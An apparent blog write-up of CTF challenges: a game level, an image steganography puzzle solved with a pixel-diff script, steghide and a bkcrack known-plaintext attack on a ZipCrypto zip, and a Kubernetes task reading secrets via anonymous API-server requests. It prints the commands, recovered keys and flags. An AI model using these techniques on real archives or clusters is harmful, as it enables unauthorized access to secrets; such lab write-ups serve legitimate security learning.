&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/yM0C7nL.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Oh no! The game is opened on the 2nd level! Let’s change this room to “Level1” and Play again! And yes It’s a new Level&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/me4efrx.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;After moving right and left, I found the flag!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/gj4wGE9.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And Yes We did it! Just move right and left and collect the letters ! and you’ll get this one ! Wrap it in Securinets{}&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/cpA2O6c.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Flag:  &lt;code&gt;Securinets&amp;#123;Gam1ng_AnD_L0VE&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;misc-full-difference&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#misc-full-difference&#34;&gt;#&lt;/a&gt; Misc: Full Difference&lt;/h1&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/dROW4SQ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Full Difference, The difference will make a difference! What is that thing ?? we got 2 images with different type but same picture!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/dr87PxX.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Thinking a little bit can we understand what the author means! Full difference! It means that the pixels should be different a full difference! which means the Red,Green and Blue channels should be differents!&lt;/p&gt;
&lt;p&gt;“Will make a difference!” After extracting the different pixels we should calculate the difference between each channels ?? Mmmmm makes sense!&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;figcaption&gt;&lt;span&gt;solver&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;from&lt;/span&gt; PIL &lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; Image&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;import&lt;/span&gt; string &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;im1=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;tobi.jpg&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;im2=Image.&lt;span class=&#34;built_in&#34;&gt;open&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&amp;quot;tobi.png&amp;quot;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pix2=im2.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pix1=im1.load()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;width,height=im1.size&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;result=&lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;data=[]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; i &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;,width):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; j &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;,height):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; pix1[i,j] != pix2[i,j] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;]:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; k &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;range&lt;/span&gt;(&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;,&lt;span class=&#34;number&#34;&gt;3&lt;/span&gt;):&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                data.append(&lt;span class=&#34;built_in&#34;&gt;chr&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;abs&lt;/span&gt;(pix1[i,j][k] - pix2[i,j][k])))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; char &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; data:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; char &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; string.ascii_letters + string.digits + string.punctuation:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        result+=char&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;print&lt;/span&gt;(result)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;So the logic behind that code is to extract the pixels that have a full difference then calculate the difference between them. After that we convert the numbers to chars (should be printable!)&lt;/p&gt;
&lt;p&gt;This expression will give us the different pixels&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;figcaption&gt;&lt;span&gt;exp&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;pix1[i,j] != pix2[i,j] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;0&lt;/span&gt;] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;] &lt;span class=&#34;keyword&#34;&gt;and&lt;/span&gt; pix1[i,j][&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;] != pix2[i,j][&lt;span class=&#34;number&#34;&gt;2&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In addition this expression collect the result of calculation the diff between the 2 pixels of each image!&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;figcaption&gt;&lt;span&gt;diff&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;data.append(&lt;span class=&#34;built_in&#34;&gt;chr&lt;/span&gt;(&lt;span class=&#34;built_in&#34;&gt;abs&lt;/span&gt;(pix1[i,j][k] - pix2[i,j][k])))&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Then it’s time to convert it to printable data!&lt;/p&gt;
&lt;figure class=&#34;highlight python&#34;&gt;&lt;figcaption&gt;&lt;span&gt;print&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; char &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; data:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; char &lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; string.ascii_letters + string.digits + string.punctuation:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        result+=char&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Running this code will give you this base64 encoding!  &lt;code&gt;dGgxNV8xNV9zaDB1TGRfYjNfaDRyRA==&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Bingo we got this statement!  &lt;code&gt;th15_15_sh0uLd_b3_h4rD&lt;/code&gt; . Let’s wrap it in Securinets! Oh nooo! Didn’t work. I guess the challenge is not finished!&lt;/p&gt;
&lt;p&gt;We have 2 images! PNG and JPEG. Mmmm Let’s try to do some steganography on these images using the password/key that we got previously.&lt;/p&gt;
&lt;p&gt;The 1st idea in my mind is to try steghide! Nothing else! Let’s try it&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/VLbBAGf.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;YEEES MAAN! We got a flag.zip file! But wait it’s protected again 😦. I tried to brute force that thing using rockyou but failed !!! What is going on here! The flag is inside that zip what we should to do now!&lt;/p&gt;
&lt;p&gt;Let’s extract more information about the zip using  &lt;code&gt;7z&lt;/code&gt;  utility&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;7z&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;7z l  -slt flag.zip&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Path = flag.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Folder = -&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Size = 40&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Packed Size = 52&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Modified = 2022-11-18 21:17:23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Created =&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Accessed =&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Attributes = A&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Encrypted = +&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Comment =&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CRC = 4F639BBA&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Method = ZipCrypto Store&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Host OS = FAT&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Version = 20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volume Index = 0&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Nice the flag.txt size is 40 bytes! So our flag is 40-chars strings! The encryption method is  &lt;code&gt;ZipCrypto&lt;/code&gt; !&lt;/p&gt;
&lt;p&gt;Bingoo! This method is vulnerable! Let’s check how can we get our flag!&lt;/p&gt;
&lt;p&gt;After some searching we found a repository talking about “Crack legacy zip encryption with Biham and Kocher’s known plaintext attack.”&lt;/p&gt;
&lt;p&gt;I recommend to check this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL2tpbWNpODYvYmtjcmFjaw==&#34;&gt;repo&lt;/span&gt; and understand how this attack can be manipulated and how to install that tool!&lt;/p&gt;
&lt;p&gt;Let’s now start downloading the tool&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;wget&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;wget https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We need to recover the internal key that will allow us to extract the file!&lt;/p&gt;
&lt;p&gt;The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack. In our case we have a flag.txt that contains  &lt;code&gt;Securinets&amp;#123;*&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;In our case we know 11 chars ( &lt;code&gt;Securinets&amp;#123;&lt;/code&gt; ) and the last char  &lt;code&gt;&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let’s recover our key now!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;prepare our data&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -n &lt;span class=&#34;string&#34;&gt;&amp;quot;Securinets&amp;#123;&amp;quot;&lt;/span&gt; &amp;gt; plaintext.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -n &lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;#125;&amp;quot;&lt;/span&gt; | xxd &lt;span class=&#34;comment&#34;&gt;# 7d is the result&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The attack requires the plain text content and in case there is another seperate bytes we can specify the offset and the byte value in hex&lt;/p&gt;
&lt;p&gt;Now time to work !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;get the key&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;bkcrack-1.5.0-Linux/bkcrack -C flag.zip -c flag.txt -p plaintext.txt -x 39 7d &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bkcrack 1.5.0 - 2022-07-07&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[16:21:19] Z reduction using 4 bytes of known plaintext&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;100.0 % (4 / 4)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[16:21:19] Attack on 1405963 Z values at index 6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Keys: 184a904b d4557686 2222c7f2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9.2 % (129555 / 1405963)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[16:24:40] Keys&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;184a904b d4557686 2222c7f2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We got the keys !  &lt;code&gt;184a904b d4557686 2222c7f2&lt;/code&gt; . Now we can decipher/decrypt the file! which means extract it from the zip!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;extract&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;bkcrack-1.5.0-Linux/bkcrack -C flag.zip -c flag.txt -k 184a904b d4557686 2222c7f2 -d my_flag.txt   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bkcrack 1.5.0 - 2022-07-07&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[16:32:25] Writing deciphered data my_flag.txt (maybe compressed)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Wrote deciphered data.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo We got the flag!!! How 2 images can hide data like that!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/O8uXhZV.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Flag:  &lt;code&gt;Securinets&amp;#123;Z1p_CRyPt0_&amp;amp;_5t3gH1d3_1s_BAd&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;kubernetes-challenge-serie&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-challenge-serie&#34;&gt;#&lt;/a&gt; Kubernetes challenge serie&lt;/h1&gt;
&lt;p&gt;NCSC’2023 consider the 1st tunisian CTF competition that have a whole Kubernetes Category! These are oriented for beginners/Intermediate users to consodilate their basic knowledge in Kubernetes!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/U69KQtM.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;h2 id=&#34;kubernetes-secrets&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#kubernetes-secrets&#34;&gt;#&lt;/a&gt; Kubernetes: Secrets:&lt;/h2&gt;
&lt;p&gt;In this challenge we get an IP and the author told us that he have a secret in the cluster!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/PCmO273.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Visiting the IP on the browser will lead us to the author page! This is not our objective!&lt;/p&gt;
&lt;p&gt;We need to access to the API-Server. Let’s check the default port 6443&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;curl&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;curl -sk https://20.169.73.19:6443/version&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And this request is failed! Mmmm The author change the default api-server?? Nmap time! Let’s scan that IP!&lt;/p&gt;
&lt;p&gt;After checking the IP we get that port opened 7443!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/GunNYhA.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And Yes! We got a response! It’s KUBERNETES TIME!!&lt;/p&gt;
&lt;p&gt;Let’s check what permission we have as an anonymous users! To be honest I’ll try to check if I can got namespaces Or secrets first! Let me check that!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;curl-namespaces&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;curl -sk https://20.169.73.19:7443/api/v1/namespaces | grep &lt;span class=&#34;string&#34;&gt;&amp;#x27;&amp;quot;name&amp;quot;: &amp;quot;&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And we got a list of namespaces! This is cool! We have  &lt;code&gt;task1,task2,task3 and task4&lt;/code&gt;  namespaces! I bet that each challenge is in single namespace! This is Great!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/vZrtZLd.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Hummm We need secrets and this is the 1st challenge! So We are sure that we can list the secrets in the  &lt;code&gt;task1&lt;/code&gt;  namespace!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;curl-namespaces&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;curl -sk https://20.169.73.19:7443/api/v1/namespaces/task1/secrets&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Bingo We got the Secrets List! We are on the right way!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/0PFJsCI.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Flag :  &lt;code&gt;Securinets&amp;#123;S3crEts_Ar3_S0_CriT1c4LL&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We got a message! We must check it for sure!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Look what we got here !&lt;/p&gt;
